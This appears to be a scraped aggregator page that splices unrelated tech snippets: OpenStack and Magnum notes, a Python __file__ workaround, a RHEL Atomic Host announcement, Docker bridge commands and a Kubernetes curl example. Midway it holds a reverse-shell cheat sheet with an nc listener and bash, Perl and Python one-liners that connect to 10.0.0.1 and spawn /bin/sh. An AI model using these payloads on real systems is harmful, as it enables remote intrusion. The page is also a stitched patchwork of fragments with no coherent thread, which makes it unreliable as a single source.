
Add network management for native docker https://blueprints.launchpad.net/magnum/+spec/native-docker-network
https://etherpad.openstack.org/p/magnum-native-docker-network
A while back, I wrote an article about taking consistent snapshots of your virtual machines in your OpenStack environment. However, this method was really intrusive, since it required being inside the virtual machine and manually triggering a filesystem freeze. In this article, I will use a different approach to achieve the same goal without the need to be inside the virtual machine.
The only requirement is to have a virtual machine running the qemu-guest-agent.
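... ➦Pluribus, which has already raised 95 million US dollars in funding, makes Server Switch products. Its CEO says they can overcome both the scalability, invisibility and performance problems of VMware's products and the closed nature of the Cisco ACI system. Put plainly, the network is built into the server, but network processing happens in the switching chip rather than in the CPU, the same as Facebook Wedge. @盛科张卫峰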
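__file__ only works properly when the code is run from a file; in the interactive command line you need a workaround:
import os
import inspect
import sys
# An interactive session has no __file__, so derive it from the current frame.
if not hasattr(sys.modules[__name__], '__file__'):
    __file__ = inspect.getfile(inspect.currentframe())
# Print the directory that contains the current file.
print(os.path.dirname(os.path.abspath(__file__)))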
Red Hat has announced the first public beta of Red Hat Enterprise Linux 7 Atomic Host. The beta is available from Red Hat and on Amazon Web Services and Google Compute Platform.
What can you expect from the Red Hat Enterprise Linux 7 Atomic Host Beta?
Red Hat Enterprise Linux 7 Atomic Host Beta provides a streamlined host platform that is optimized to run application containers. The software components included in Red Hat Enterprise Linux 7 Atomic Host Beta, as well as the default system tunings, have been designed to enhance the performance, scalability and security of containers, giving you the optimal platform on which to deploy and run application containers.
... ➦nc -l -p 8080 -vvv
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative Perl reverse shell here.
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
... ➦First, change Docker's default bridge:
# Stop the Docker daemon process
systemctl stop docker
# Bring the default bridge docker0 down and delete it
ip link set dev docker0 down
brctl delbr docker0
# Create a new Linux bridge, localbr0
brctl addbr localbr0
# Change 10.10.x.0/24 on each host; make sure the subnets do not overlap between hosts
ip addr add 10.10.2.1/24 dev localbr0
ip link set dev localbr0 up
echo 'OPTIONS="--bridge localbr0 --iptables=false"'>>/etc/sysconfig/docker
systemctl start docker
Add a GRE connection to the bridge above
... ➦You can enable Kubernetes authentication by following this documentation. Then you happily access kube-apiserver with curl:
# curl -k -N -X GET -H "Authorization: Basic XXXXXXXXXX" http://localhost:8080/api/v1/namespaces/default/pods
{
  "kind": "PodList",
  "apiVersion": "v1",
  "metadata": {
    "selfLink": "/api/v1/namespaces/default/pods",
    "resourceVersion": "74034"
  },
  "items": []
}
Nothing blocks this request! What is wrong? Wait a moment; checking the Kubernetes documentation, I find this:
... ➦The Kubernetes API is served by the Kubernetes apiserver process. Typically, there is one of these running on a single kubernetes-master node.